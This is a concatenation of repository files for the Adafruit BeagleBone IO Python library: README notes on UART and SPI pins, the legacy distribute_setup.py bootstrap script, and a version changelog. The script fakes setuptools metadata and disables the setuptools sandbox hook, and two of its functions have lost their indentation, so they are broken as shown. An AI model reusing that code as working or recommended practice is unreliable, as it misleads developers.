with serial.Serial(port = "/dev/ttyO1", baudrate=9600) as ser:
print("Serial is open!")
ser.write(b"Hello World!")
```
* Available UART names on BeagleBone
* `UART1`: /dev/ttyO1, Rx: P9_26, Tx: P9_24
* `UART2`: /dev/ttyO2, Rx: P9_22, Tx: P9_21
* `UART4`: /dev/ttyO4, Rx: P9_11, Tx: P9_13
* `UART5`: /dev/ttyO5, Rx: P8_38, Tx: P8_37
* note: `UART5` requires `disable_uboot_overlay_video=1` in `/boot/uEnv.txt`
* Available UART names on PocketBeagle
* `PB-UART0`: /dev/ttyO0, Rx: P1_30, Tx: P1_32
* `PB-UART1`: /dev/ttyO1, Rx: P2_11, Tx: P2_09
* `PB-UART2`: /dev/ttyO2, Rx: P1_08, Tx: P1_10
* [Loopback test with UART1 and UART2](https://learn.adafruit.com/setting-up-io-python-library-on-beaglebone-black/uart#testing-and-using-the-uart)
### [SPI](https://learn.adafruit.com/setting-up-io-python-library-on-beaglebone-black/spi)
* Use [`config-pin` to set pin mode](https://github.com/beagleboard/bb.org-overlays/tree/master/tools/beaglebone-universal-io) for [SPI pins](http://beagleboard.org/static/images/cape-headers-spi.png)
* SPI0
* SPI0_CS0: `config-pin p9.17 spi_cs`
* SPI0_D0: `config-pin p9.21 spi`
* SPI0_D1: `config-pin p9.18 spi`
* SPI0_SCLK: `config-pin p9.22 spi_sclk`
* SPI1
* SPI1_CS0: `config-pin p9.20 spi_cs`
* SPI1_CS0: `config-pin p9.28 spi_cs`
* SPI1_CS1: `config-pin p9.19 spi_cs`
* SPI1_CS1: `config-pin p9.42 spi_cs`
* SPI1_D0: `config-pin p9.29 spi`
* SPI1_D1: `config-pin p9.30 spi`
* SPI1_SCLK: `config-pin p9.31 spi_sclk`
* Example:
```
from Adafruit_BBIO.SPI import SPI
#spi = SPI(bus, device) #/dev/spidev<bus>.<device>
# /dev/spidev0.0
spi = SPI(1,0)
print(spi.xfer2([32, 11, 110, 22, 220]))
spi.close()
# /dev/spidev0.1
spi = SPI(1,1)
print(spi.xfer2([32, 11, 110, 22, 220]))
spi.close()
# /dev/spidev1.0
spi = SPI(2,0)
print(spi.xfer2([32, 11, 110, 22, 220]))
spi.close()
# /dev/spidev1.1
spi = SPI(2,1)
print(spi.xfer2([32, 11, 110, 22, 220]))
spi.close()
```
### eQEP
To use the enhanced Quadrature Encoder Pulse (eQEP) module, please refer to the [`Encoder` module's documentation](https://github.com/adafruit/adafruit-beaglebone-io-python/tree/master/Adafruit_BBIO#usage).
## Running tests
Install py.test to run the tests. You'll also need the python compiler package for pytest:
```
sudo pip3 install pytest
```
Execute the following in the root of the project:
```
pytest
```
NOTE: `sudo` should not be required as udev configures group ownership and permission for [GPIO](https://github.com/rcn-ee/repos/blob/master/bb-customizations/suite/stretch/debian/80-gpio-noroot.rules) and [PWM](https://github.com/rcn-ee/repos/blob/master/bb-customizations/suite/stretch/debian/81-pwm-noroot.rules)
## Reporting issues
When reporting issues, please run the following script which will print the system configuration:
```
sudo /opt/scripts/tools/version.sh
```
and paste the output in a reply.
This script should be present for any Debian or Ubuntu image downloaded from:
https://beagleboard.org/ or https://rcn-ee.com/
## Credits
The BeagleBone IO Python library was originally forked from the excellent MIT Licensed [RPi.GPIO](https://code.google.com/p/raspberry-gpio-python) library written by Ben Croston.
## License
Written by Justin Cooper, Adafruit Industries. BeagleBone IO Python library is released under the MIT License.
import os
import shutil
import sys
import time
import fnmatch
import tempfile
import tarfile
import optparse
from distutils import log
# site.USER_SITE only exists on Python >= 2.6; treat it as absent otherwise
# so later --user handling can detect that.
try:
    from site import USER_SITE
except ImportError:
    USER_SITE = None
# Prefer subprocess for running child interpreters; fall back to os.spawnl
# on ancient Pythons (2.3) that lack the subprocess module.
try:
    import subprocess
    def _python_cmd(*args):
        """Run the current interpreter with *args*; True when it exits 0."""
        args = (sys.executable,) + args
        return subprocess.call(args) == 0
except ImportError:
    # will be used for python 2.3
    def _python_cmd(*args):
        """Run the current interpreter with *args*; True when it exits 0."""
        args = (sys.executable,) + args
        # quoting arguments if windows
        if sys.platform == 'win32':
            def quote(arg):
                if ' ' in arg:
                    return '"%s"' % arg
                return arg
            args = [quote(arg) for arg in args]
        return os.spawnl(os.P_WAIT, sys.executable, *args) == 0
# Distribute version fetched when none is installed, and where to fetch it.
DEFAULT_VERSION = "0.6.45"
DEFAULT_URL = "https://pypi.python.org/packages/source/d/distribute/"
# Version advertised by the fake setuptools metadata written further below.
SETUPTOOLS_FAKED_VERSION = "0.6c11"
# PKG-INFO content used to masquerade as an installed setuptools.
SETUPTOOLS_PKG_INFO = """\
Metadata-Version: 1.0
Name: setuptools
Version: %s
Summary: xxxx
Home-page: xxx
Author: xxx
Author-email: xxx
License: xxx
Description: xxx
""" % SETUPTOOLS_FAKED_VERSION
def _install(tarball, install_args=()):
    """Unpack *tarball* in a scratch directory and run its ``setup.py install``.

    Returns 2 (used as an exit code) when the installation fails; otherwise
    falls through returning None on success.
    """
    work_dir = tempfile.mkdtemp()
    log.warn('Extracting in %s', work_dir)
    saved_cwd = os.getcwd()
    try:
        os.chdir(work_dir)
        archive = tarfile.open(tarball)
        _extractall(archive)
        archive.close()

        # The tarball contains a single top-level directory; step into it.
        extracted = os.path.join(work_dir, os.listdir(work_dir)[0])
        os.chdir(extracted)
        log.warn('Now working in %s', extracted)

        log.warn('Installing Distribute')
        if not _python_cmd('setup.py', 'install', *install_args):
            log.warn('Something went wrong during the installation.')
            log.warn('See the error message above.')
            # exitcode will be 2
            return 2
    finally:
        os.chdir(saved_cwd)
        shutil.rmtree(work_dir)
def _build_egg(egg, tarball, to_dir):
    """Unpack *tarball*, build a bdist_egg into *to_dir* and verify that the
    expected *egg* file now exists (raising IOError otherwise).
    """
    work_dir = tempfile.mkdtemp()
    log.warn('Extracting in %s', work_dir)
    saved_cwd = os.getcwd()
    try:
        os.chdir(work_dir)
        archive = tarfile.open(tarball)
        _extractall(archive)
        archive.close()

        # The tarball contains a single top-level directory; step into it.
        extracted = os.path.join(work_dir, os.listdir(work_dir)[0])
        os.chdir(extracted)
        log.warn('Now working in %s', extracted)

        log.warn('Building a Distribute egg in %s', to_dir)
        _python_cmd('setup.py', '-q', 'bdist_egg', '--dist-dir', to_dir)
    finally:
        os.chdir(saved_cwd)
        shutil.rmtree(work_dir)
    # returning the result
    log.warn(egg)
    if not os.path.exists(egg):
        raise IOError('Could not build the egg.')
def _do_download(version, download_base, to_dir, download_delay):
    """Obtain the distribute egg for this interpreter (building it from a
    downloaded tarball when needed), put it first on sys.path and prime
    setuptools' bootstrap hook.
    """
    egg_name = 'distribute-%s-py%d.%d.egg' % (version,
                                              sys.version_info[0],
                                              sys.version_info[1])
    egg = os.path.join(to_dir, egg_name)
    if not os.path.exists(egg):
        tarball = download_setuptools(version, download_base,
                                      to_dir, download_delay)
        _build_egg(egg, tarball, to_dir)
    sys.path.insert(0, egg)
    import setuptools
    setuptools.bootstrap_install_from = egg
def use_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
                   to_dir=os.curdir, download_delay=15, no_fake=True):
    """Ensure a suitable setuptools/distribute is importable, downloading and
    bootstrapping distribute when necessary.

    When ``no_fake`` is false, a fake setuptools PKG-INFO is planted to
    shadow a genuine setuptools installation.
    """
    # making sure we use the absolute path
    to_dir = os.path.abspath(to_dir)
    # Remember whether packaging modules were already imported: if so we
    # cannot safely swap versions in this process and must bail out below.
    was_imported = 'pkg_resources' in sys.modules or \
        'setuptools' in sys.modules
    try:
        try:
            import pkg_resources
            # Setuptools 0.7b and later is a suitable (and preferable)
            # substitute for any Distribute version.
            try:
                pkg_resources.require("setuptools>=0.7b")
                return
            except (pkg_resources.DistributionNotFound,
                    pkg_resources.VersionConflict):
                pass
            # A pkg_resources without the _distribute marker is genuine
            # setuptools; treat it as missing so distribute gets installed.
            if not hasattr(pkg_resources, '_distribute'):
                if not no_fake:
                    _fake_setuptools()
                raise ImportError
        except ImportError:
            return _do_download(version, download_base, to_dir, download_delay)
        try:
            pkg_resources.require("distribute>=" + version)
            return
        except pkg_resources.VersionConflict:
            e = sys.exc_info()[1]
            if was_imported:
                sys.stderr.write(
                "The required version of distribute (>=%s) is not available,\n"
                "and can't be installed while this script is running. Please\n"
                "install a more recent version first, using\n"
                "'easy_install -U distribute'."
                "\n\n(Currently using %r)\n" % (version, e.args[0]))
                sys.exit(2)
            else:
                del pkg_resources, sys.modules['pkg_resources']  # reload ok
                return _do_download(version, download_base, to_dir,
                                    download_delay)
        except pkg_resources.DistributionNotFound:
            return _do_download(version, download_base, to_dir,
                                download_delay)
    finally:
        if not no_fake:
            _create_fake_setuptools_pkg_info(to_dir)
def download_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
                        to_dir=os.curdir, delay=15):
    """Download distribute from a specified location and return its filename

    `version` should be a valid distribute version number that is available
    as an egg for download under the `download_base` URL (which should end
    with a '/'). `to_dir` is the directory where the egg will be downloaded.
    `delay` is the number of seconds to pause before an actual download
    attempt.
    """
    # making sure we use the absolute path
    to_dir = os.path.abspath(to_dir)
    # urlopen moved between Python 2 and 3.
    try:
        from urllib.request import urlopen
    except ImportError:
        from urllib2 import urlopen
    archive_name = "distribute-%s.tar.gz" % version
    url = download_base + archive_name
    saveto = os.path.join(to_dir, archive_name)
    if not os.path.exists(saveto):  # Avoid repeated downloads
        response = out_file = None
        try:
            log.warn("Downloading %s", url)
            response = urlopen(url)
            # Read/write all in one block, so we don't create a corrupt file
            # if the download is interrupted.
            payload = response.read()
            out_file = open(saveto, "wb")
            out_file.write(payload)
        finally:
            if response:
                response.close()
            if out_file:
                out_file.close()
    return os.path.realpath(saveto)
def _no_sandbox(function):
    """Decorator that disables the setuptools DirectorySandbox (when it is
    importable) for the duration of *function*, so the wrapped code may
    write outside the build directory.
    """
    def __no_sandbox(*args, **kw):
        try:
            from setuptools.sandbox import DirectorySandbox
            # Replace the violation hook with a no-op, stashing the
            # original on the class so nested calls don't re-patch.
            if not hasattr(DirectorySandbox, '_old'):
                def violation(*args):
                    pass
                DirectorySandbox._old = DirectorySandbox._violation
                DirectorySandbox._violation = violation
                patched = True
            else:
                patched = False
        except ImportError:
            patched = False
        try:
            return function(*args, **kw)
        finally:
            # Restore the original violation hook if we patched it.
            if patched:
                DirectorySandbox._violation = DirectorySandbox._old
                del DirectorySandbox._old
    return __no_sandbox
def _patch_file(path, content):
    """Back up the file at *path* (via _rename_path), then rewrite it with
    *content*.  Returns False when the file already matches, True after a
    successful patch.
    """
    reader = open(path)
    current = reader.read()
    reader.close()
    if current == content:
        # already patched
        log.warn('Already patched.')
        return False
    log.warn('Patching...')
    _rename_path(path)
    writer = open(path, 'w')
    try:
        writer.write(content)
    finally:
        writer.close()
    return True

_patch_file = _no_sandbox(_patch_file)
def _same_content(path, content):
    """Return True when the file at *path* currently holds *content*."""
    handle = open(path)
    on_disk = handle.read()
    handle.close()
    return on_disk == content
def _rename_path(path):
    """Move *path* aside to a timestamped ``.OLD`` name; return that name."""
    backup = '%s.OLD.%s' % (path, time.time())
    log.warn('Renaming %s to %s', path, backup)
    os.rename(path, backup)
    return backup
def _remove_flat_installation(placeholder):
    """Neutralize a flat (non-egg) setuptools installation at *placeholder*.

    Patches its egg-info with the fake PKG-INFO and renames the setuptools
    modules out of the way.  Returns True when something was moved, False
    when nothing needed doing (or None when no egg-info was found).
    """
    if not os.path.isdir(placeholder):
        log.warn('Unknown installation at %s', placeholder)
        return False
    # Locate the setuptools egg-info entry (was named `file`, which
    # shadowed the builtin).
    found = False
    for entry in os.listdir(placeholder):
        if fnmatch.fnmatch(entry, 'setuptools*.egg-info'):
            found = True
            break
    if not found:
        log.warn('Could not locate setuptools*.egg-info')
        return
    log.warn('Moving elements out of the way...')
    pkg_info = os.path.join(placeholder, entry)
    if os.path.isdir(pkg_info):
        patched = _patch_egg_dir(pkg_info)
    else:
        patched = _patch_file(pkg_info, SETUPTOOLS_PKG_INFO)
    if not patched:
        log.warn('%s already patched.', pkg_info)
        return False
    # now let's move the files out of the way
    for element in ('setuptools', 'pkg_resources.py', 'site.py'):
        element = os.path.join(placeholder, element)
        if os.path.exists(element):
            _rename_path(element)
        else:
            log.warn('Could not find the %s element of the '
                     'Setuptools distribution', element)
    return True

_remove_flat_installation = _no_sandbox(_remove_flat_installation)
def _after_install(dist):
    """Post-install hook: plant the fake setuptools metadata next to the
    just-installed distribute (in the install's purelib directory).
    """
    log.warn('After install bootstrap.')
    placeholder = dist.get_command_obj('install').install_purelib
    _create_fake_setuptools_pkg_info(placeholder)
def _create_fake_setuptools_pkg_info(placeholder):
    """Write a fake setuptools egg-info file plus a matching .pth entry
    into *placeholder* (the install purelib directory), so that tools
    believe setuptools is already installed there."""
    if not placeholder or not os.path.exists(placeholder):
        log.warn('Could not find the install location')
        return
    # e.g. 'setuptools-0.6c11-py2.7.egg-info'
    pyver = '%s.%s' % (sys.version_info[0], sys.version_info[1])
    setuptools_file = 'setuptools-%s-py%s.egg-info' % \
            (SETUPTOOLS_FAKED_VERSION, pyver)
    pkg_info = os.path.join(placeholder, setuptools_file)
    if os.path.exists(pkg_info):
        log.warn('%s already exists', pkg_info)
        return
    log.warn('Creating %s', pkg_info)
    try:
        f = open(pkg_info, 'w')
    except EnvironmentError:
        # best effort: no write permission is not fatal here
        log.warn("Don't have permissions to write %s, skipping", pkg_info)
        return
    try:
        f.write(SETUPTOOLS_PKG_INFO)
    finally:
        f.close()
    # the .pth file makes the fake egg-info discoverable on sys.path
    pth_file = os.path.join(placeholder, 'setuptools.pth')
    log.warn('Creating %s', pth_file)
    f = open(pth_file, 'w')
    try:
        f.write(os.path.join(os.curdir, setuptools_file))
    finally:
        f.close()
_create_fake_setuptools_pkg_info = _no_sandbox(
    _create_fake_setuptools_pkg_info
)
def _patch_egg_dir(path):
    """Replace the egg directory at *path* with a stub that contains only
    a fake EGG-INFO/PKG-INFO.  Returns False if it was already patched,
    True otherwise."""
    pkg_info = os.path.join(path, 'EGG-INFO', 'PKG-INFO')
    # nothing to do when the fake PKG-INFO is already in place
    if os.path.exists(pkg_info) and _same_content(pkg_info,
                                                  SETUPTOOLS_PKG_INFO):
        log.warn('%s already patched.', pkg_info)
        return False
    # move the real egg aside, then rebuild a minimal directory skeleton
    _rename_path(path)
    os.mkdir(path)
    os.mkdir(os.path.join(path, 'EGG-INFO'))
    fp = open(pkg_info, 'w')
    try:
        fp.write(SETUPTOOLS_PKG_INFO)
    finally:
        fp.close()
    return True
_patch_egg_dir = _no_sandbox(_patch_egg_dir)
def _before_install():
    """Pre-install hook: neutralise any installed setuptools so the
    distribute installation can proceed."""
    log.warn('Before install bootstrap.')
    _fake_setuptools()
def _under_prefix(location):
if 'install' not in sys.argv:
return True
args = sys.argv[sys.argv.index('install') + 1:]
for index, arg in enumerate(args):
for option in ('--root', '--prefix'):
if arg.startswith('%s=' % option):
top_dir = arg.split('root=')[-1]
return location.startswith(top_dir)
elif arg == option:
if len(args) > index:
top_dir = args[index + 1]
return location.startswith(top_dir)
if arg == '--user' and USER_SITE is not None:
return location.startswith(USER_SITE)
return True
def _fake_setuptools():
    """Neutralise an existing setuptools installation so distribute can
    take over.

    Locates the installed setuptools distribution via pkg_resources,
    replaces it with a fake PKG-INFO stub (handling both flat and egg
    layouts), then relaunches the current process so the patched state
    is picked up.
    """
    log.warn('Scanning installed packages')
    try:
        import pkg_resources
    except ImportError:
        # we're cool
        log.warn('Setuptools or Distribute does not seem to be installed.')
        return
    ws = pkg_resources.working_set
    try:
        # replacement=False: ask for the real setuptools, not distribute
        setuptools_dist = ws.find(
            pkg_resources.Requirement.parse('setuptools', replacement=False)
        )
    except TypeError:
        # old distribute API
        setuptools_dist = ws.find(
            pkg_resources.Requirement.parse('setuptools')
        )
    if setuptools_dist is None:
        log.warn('No setuptools distribution found')
        return
    # detecting if it was already faked
    setuptools_location = setuptools_dist.location
    log.warn('Setuptools installation detected at %s', setuptools_location)
    # if --root or --prefix was provided, and if
    # setuptools is not located in them, we don't patch it
    if not _under_prefix(setuptools_location):
        log.warn('Not patching, --root or --prefix is installing Distribute'
                 ' in another location')
        return
    # let's see if its an egg
    if not setuptools_location.endswith('.egg'):
        log.warn('Non-egg installation')
        res = _remove_flat_installation(setuptools_location)
        if not res:
            return
    else:
        log.warn('Egg installation')
        pkg_info = os.path.join(setuptools_location, 'EGG-INFO', 'PKG-INFO')
        if (os.path.exists(pkg_info) and
            _same_content(pkg_info, SETUPTOOLS_PKG_INFO)):
            log.warn('Already patched.')
            return
        log.warn('Patching...')
        # let's create a fake egg replacing setuptools one
        res = _patch_egg_dir(setuptools_location)
        if not res:
            return
    log.warn('Patching complete.')
    _relaunch()
def _relaunch():
    """Re-execute the current interpreter with the (possibly rewritten)
    sys.argv and exit with the child's return code."""
    log.warn('Relaunching...')
    # pip invokes us as '-c install ...'; restore a normal script name so
    # the relaunched process does not trip over the pip marker (relaunch bug)
    pip_markers = (
        ['-c', 'install', '--single-version-externally-managed'],
        ['-c', 'install', '--record'],
    )
    if sys.argv[:3] in pip_markers:
        sys.argv[0] = 'setup.py'
    sys.exit(subprocess.call([sys.executable] + sys.argv))
def _extractall(self, path=".", members=None):
    """Extract all members from the archive to the current working
    directory and set owner, modification time and permissions on
    directories afterwards. `path' specifies a different directory
    to extract to. `members' is optional and must be a subset of the
    list returned by getmembers().
    """
    # Backport of TarFile.extractall for old Python versions; bound onto a
    # tarfile object by the caller (hence the explicit `self` parameter).
    import copy
    import operator
    from tarfile import ExtractError
    directories = []
    if members is None:
        members = self
    for tarinfo in members:
        if tarinfo.isdir():
            # Extract directories with a safe mode.
            # (0700 first, so contents can be written; the real mode is
            # restored below once everything inside has been extracted)
            directories.append(tarinfo)
            tarinfo = copy.copy(tarinfo)
            tarinfo.mode = 448 # decimal for oct 0700
        self.extract(tarinfo, path)
    # Reverse sort directories.
    # Deepest-first order, so child metadata is fixed before the parent's
    # restored (possibly read-only) mode could block access.
    if sys.version_info < (2, 4):
        # list.sort(key=..., reverse=...) is not available before 2.4
        def sorter(dir1, dir2):
            return cmp(dir1.name, dir2.name)
        directories.sort(sorter)
        directories.reverse()
    else:
        directories.sort(key=operator.attrgetter('name'), reverse=True)
    # Set correct owner, mtime and filemode on directories.
    for tarinfo in directories:
        dirpath = os.path.join(path, tarinfo.name)
        try:
            self.chown(tarinfo, dirpath)
            self.utime(tarinfo, dirpath)
            self.chmod(tarinfo, dirpath)
        except ExtractError:
            e = sys.exc_info()[1]
            if self.errorlevel > 1:
                raise
            else:
                # low errorlevel: report and keep going
                self._dbg(1, "tarfile: %s" % e)
def _build_install_args(options):
"""
Build the arguments to 'python setup.py install' on the distribute package
"""
install_args = []
if options.user_install:
if sys.version_info < (2, 6):
log.warn("--user requires Python 2.6 or later")
raise SystemExit(1)
install_args.append('--user')
return install_args
def _parse_args():
    """Parse the command line and return the resulting options object.

    Positional arguments are deliberately discarded.
    """
    parser = optparse.OptionParser()
    parser.add_option(
        '--user', dest='user_install', action='store_true', default=False,
        help='install in user site package (requires Python 2.6 or later)')
    parser.add_option(
        '--download-base', dest='download_base', metavar="URL",
        default=DEFAULT_URL,
        help='alternative URL from where to download the distribute package')
    opts, _unused = parser.parse_args()
    return opts
def main(version=DEFAULT_VERSION):
    """Install or upgrade setuptools and EasyInstall."""
    opts = _parse_args()
    archive = download_setuptools(download_base=opts.download_base)
    return _install(archive, _build_install_args(opts))
# Script entry point: propagate main()'s return value as the process
# exit status.
if __name__ == '__main__':
    sys.exit(main())
1.1.2
---
Daniel Nguyen (2):
Update common.c
Update common.c
Drew Fustini (28):
upload to PyPI againt to resolve #293
do not set pinmux on the beaglebone blue
remove deug output
Fix dead link to bone.js #296
force Encoder period to be an integer #299
Ignore new compiler warnings in gcc 8.2.0
Update setup.py
do not set pin mode for built-in USRn LEDs
Change name of P1_3 to match bone.js
Fix warning about casting incompatible function types #308
Fix warning print format strings being truncated #308
Fix warning about casting incompatible function types #308
Fix warnings on format truncation and sizeof in strncpy #308
Fix warning about casting incompatible function types #308
Update travis config to specify Python 3.6
Update tox.ini to Python 3.6
Merge pull request #321 from adafruit/issue308
Update ISSUE_TEMPLATE.md
Update README.md
Update README.md
Merge pull request #327 from zer0cod3r/master
Merge pull request #337 from SamPovilus/docfix
Update README.md
Update README.md
Update README.md
remove -Werror from CFLAGS
Remove suppression of gcc warnings in CFLAGS #336
Update version in setup.py to v1.2
Sam Povilus (1):
fixing document locaiton and version as current location dosn't load
1.1.1
---
Attempt upload to PyPI again to avoid
error reported in issue #293
1.1.0
---
Aaron Marburg (1):
* Added usleep after successfully enabling PWM via udev.
Drew Fustini (16):
* Merge pull request #233 from zsserg/fixed_segfault_in_event_detection
* Merge pull request #257 from zsserg/develop
* Merge pull request #251 from amarburg/master
* Merge pull request #271 from fcooper/documentation-updates
* Update ADC.rst
* Update Encoder.rst
* Update ADC.rst
* Add UART entries for the PocketBeagle (issue #242)
* update install and test shell scripts
* update UART section in README
* Merge pull request #282 from erikwelsh/master
* do not load overlays for the beaglebone blue #283
* Merge pull request #284 from sam-bristow/py3-docs
* Merge pull request #285 from sam-bristow/bugfix/uart-error-reporting
* fix pwm on pocketbeagle and beaglebone blue #286
* remove debug logging
Erik Welsh (1):
* Fixed GPIO export problem; Leaves GPIO in bad state on latest BeagleBone image on PocketBeagle
Franklin S Cooper Jr (3):
* docs/SPI.rst: Fix bus numbering in examples
* docs/GPIO.rst: Add information on blinking led
* docs/GPIO.rst Make documentation a bit newbie friendly
Sam Bristow (3):
* Use print() function in all code and docs
* Use new python-serial API
* Return error-code for failing interface
zserg (5):
* Fixed SEGFAULT when calling remove_event_detect() inside python callback function.
* Fixed SEGFAULT when calling remove_event_detect() inside python callback function.
* Fixed SEGFAULT in event_gpio,c run_callbacks() * Added more elaborate epoll() error logging
* Minor style fixes
1.0.10
----
**features**
* automatically set pin modes for UART (PR #158)
* Encoder: README.md: added note about eqep group change (PR #214)
* deprecate out of date Adafruit_I2C.py (PR #215)
* Add Encoder module info to main README.md (PR #217)
* Add automatic API documentation generation (PR #219)
* Separate API docs into modules (PR #221)
**shortlog**
* David Planella (46):
* Encoder: README.md: added note about eqep group change
* Add Encoder module info to main README.md
* Added docstrings using Google syntax and Sphinx support to generate the API documentation for the Encoder and PWM modules for now.
* Made kernel version check to happen only if running on a beaglebone. The readthedocs builders that import the Encoder module have an old 3.3 kernel and the autodoc build fails
* Use the default readthedocs theme
* Use readthedocs theme if building docs there, remove redundand search link
* Readthedocs theme tweaks
* Removed redundant TOC, added global description
* Added UART documentation
* Added documentation badge
* Added ADC API docs, fixed UART module definition
* API docs: added SPI module
* Added SPI module attribute docs
* Added Python badges to README file
* Added SPI pins table and first shot at GPIO module. Functions still need to be documented
* Merge branch 'readthedocs' of https://github.com/dplanella/adafruit-beaglebone-io-python into readthedocs
* Documented the API docs build process
* Added docstrings using Google syntax and Sphinx support to generate the API documentation for the Encoder and PWM modules for now.
* Made kernel version check to happen only if running on a beaglebone. The readthedocs builders that import the Encoder module have an old 3.3 kernel and the autodoc build fails
* Use the default readthedocs theme
* Use readthedocs theme if building docs there, remove redundand search link
* Readthedocs theme tweaks
* Removed redundant TOC, added global description
* Added UART documentation
* Added documentation badge
* Added ADC API docs, fixed UART module definition
* API docs: added SPI module
* Added SPI module attribute docs
* Added Python badges to README file
* Added SPI pins table and first shot at GPIO module. Functions still need to be documented
* Documented the API docs build process
* Merge branch 'readthedocs' of https://github.com/dplanella/adafruit-beaglebone-io-python into readthedocs
* Update README.md
* Added some more API doc content
* Sync from upstream master
* Minor documentation and configuration improvements
* Finished documenting GPIO
* rST fixes
* Update README.md
* Minor API doc improvements
* Merge branch 'readthedocs' of https://github.com/dplanella/adafruit-beaglebone-io-python into readthedocs
* Generate the API documentation from a master index and a separate file for each module
* Sync from upstream master
* Improvements to the API docs output config
* Update docs generation description to reflect new separate modules
* Updated ADC API docs
* Drew Fustini (10):
* use set_pin_mode() to set uart pinmux (#158)
* Add SPI instructions to README (#158)
* Update README.md
* Fix spidev path mismatch (#216)
* Merge pull request #217 from dplanella/patch-2
* Merge pull request #214 from dplanella/patch-1
* Deprecate Adafruit_BBIO.I2C in favor of Adafruit_GPIO.I2C (#215)
* Merge pull request #219 from dplanella/readthedocs
* relocate doc dir to avoid confusion (#218)
* Merge pull request #221 from dplanella/readthedocs
1.0.9
----
**Features:**
* Issue #194: Encoder position cannot be set
* PR #205: Encoder: add support for reading/writing sysfs attributes
**Fixes:**
* Issue #198: use https for DEFAULT_URL in distribute_setup.py
* Issue #197: Fix leak of pwm enable file descriptor
* Issue #189: Fix seg fault of PWM in Python 3.6
* Issue #180: Clarify there is no 0 prefix for pin labels
* PR #201: Encoder: do kernel check, PEP8 cleanup
* PR #202: Encoder: corrected kernel check logic
* PR #207: Encoder: improved usage documentation
* PR #210: Encoder: fix sysfs import, make code Python 3 compatible
* PR #212: Encoder: fix Python 3 compatibility
* PR #213: Encoder: fix frequency calculation from period
**shortlog:**
* David Planella (18):
* Encoder: initialize only the given channel
* Sync from master
* Encoder: do kernel check, PEP8 cleanup
* Encoder: added sysfs module
* Encoder: use sysfs to write QEP attributes
* Encoder: corrected kernel check logic
* Merge pull request #2 from adafruit/master
* Encoder: convert get/set methods to properties, update apidoc strings
* Encoder: updated README
* Encoder: add README apt install clarification
* Encoder: copyright assignment note, updated comments
* Encoder: added usage notes
* Encoder: improved usage documentation
* Encoder: minor fix to usage example
* Encoder: added a note about permissions
* Encoder: switched sysfs to be a relative import compatible with Python 2 and 3
* Encoder: use items() instead of iteritems() to be Python 3 compatible
* Encoder: fix frequency getter
* Drew Fustini (18):
* use https for DEFAULT_URL in distribute_setup.py (#198)
* fix except syntax for Python 3
* use dict.items() instead of dict.iteritems() for Python 3
* fix error in set_brightness()
* close enable_fd when stopping PWM output (#197)
* Merge pull request #199 from dplanella/patch-1
* Fix leak of pwm enable file descriptor (#197)
* Merge pull request #201 from dplanella/encoder-cleanup
* remove test_rotary.py as not valid for pytest
* Fix seg fault of PWM in Python 3.6 (#189)
* Merge pull request #202 from dplanella/patch-2
* Clarify there is no 0 prefix for pin lables (#180)
* Merge pull request #205 from dplanella/encoder-sysfs
* assign copyright for new file to Adafruit Industries
* Add bash scripts to help install and test
* Merge pull request #212 from dplanella/patch-4
* Merge pull request #207 from dplanella/patch-3
* Merge pull request #213 from dplanella/fix-encoder-frequency
1.0.8
----
**Fixes:**
* Issue #196: cache board type to avoid poor performance
* Issue #192: fix PocketBeagle PWM pin typo
* Issue #191: turn off RotaryEncoder's debug output by default
* Issue #188: GPIO is extremely slow (20ms to toggle)
* Issue #186: problems with UART
**shortlog:**
* David Planella (12):
* Copy Encoder module comments to README.md
* Formatted Encoder README in markdown
* Fixed Encoder README formatting
* Removed QEP instructions from Encoder module
* Fixes to Encoder README
* Updated Encoder README
* Encoder README: added info on dedicated overlays
* Encoder README: updated info on pre-requisites
* Encoder README update
* Encoder README update
* Add logging support, turn off unconditional debug output
* Encoder: remove unused logging code
* Drew Fustini (3):
* Merge pull request #195 from dplanella/master
* Fix PocketBeagle PWM pin typo (#192)
* cache board type to avoid poor performance (#196)
1.0.7
----
**Fixes:**
* Issue #188: GPIO is extremely slow (20ms to toggle)
**shortlog:**
* Drew Fustini (4):
* Update README.md
* add config-pin example to README
* Filter DEBUG syslog to avoid poor performance #188
* Change log level from INFO to DEBUG #188
1.0.6
----
* Currently recommended image: [Debian 9.2 "Stretch" iot (2017-10-29)](https://elinux.org/Beagleboard:BeagleBoneBlack_Debian#microSD.2FStandalone:_.28stretch-iot.29_.28All_BeagleBone_Variants_.26_PocketBeagle.29)
* Install [Linux kernel](https://elinux.org/Beagleboard:BeagleBoneBlack_Debian#Kernel_Options) [4.14.x](https://elinux.org/Beagleboard:BeagleBoneBlack_Debian#Mainline_.284.14.x_lts.29) to enable [non-root control of GPIO](https://github.com/rcn-ee/repos/blob/master/bb-customizations/suite/stretch/debian/80-gpio-noroot.rules) and [PWM](https://github.com/rcn-ee/repos/blob/master/bb-customizations/suite/stretch/debian/81-pwm-noroot.rules) [_(commit)_](https://github.com/adafruit/adafruit-beaglebone-io-python/commit/b65cbf8e41b444bad7c4ef6cfd4f88a30210fd78)
**Features:**
* Add support for Linux 4.14 kernel including new "udev" style for PWM entries in /sys
* Fix GPIO regression due to BeagleBone Blue LED support (issue #178)
* Add support for the PocketBeagle (issue #172)
**shortlog:**
* Drew Fustini (39):
* Add -Wno-unit_address_vs_reg to avoid dtc warning
* check if board is BeagleBone Blue or PocketBeagle
* check if BeagleBone Blue before accessing non-standard LEDs
* Add test for GPIO regression #178
* change syslog mask level to DEBUG
* add "Adafruit_BBIO" to syslog()
* update test for issue #178
* remove polarity "hack" for PWM #170
* move pwm_set_polarity() after period is set
* add test for issue #170
* only check kernel overlays if u-boot overlays are not being used
* Attempt to use udev ecap path for pwm path
* add test script for all BeagleBone PWM outputs
* update PWM test for 4.14 kernel udev paths
* minor change to pwm debug logging
* sleep to avoid udev race condition #185
* Mark A. Yoder (1):
* Added BAT25, BAT50, BAT75, BAT100 and WIFI LEDs
* Peter Lawler (1):
* Missing CR/LF
* Robert Nelson (10):
* source/common.c: add initial PocketBeagle values
* source/common.c: PocketBeagle, no slots file, everything built-in
* source/common.c: PocketBeagle, no slots file disable here too
* source/c_pwm.c: HACK: U-Boot pre-setup everything, dont search for specific overlay
* source/c_pwm.c: HACK: PocketBeagle: v4.14.x
* source/c_pwm.c: debug pwm_path/pwm_path_udev
* source/c_pwm.c: pwm: add support for pwmchipX/pwm-X:Y syntax
* source/c_pwm.c: disable pwm_set_polarity (broken in v4.9.x/v4.14.x)
* source/common.c: Blue Fix GP0_3 id
* source/common.c: PocketBeagle Fix P2.24
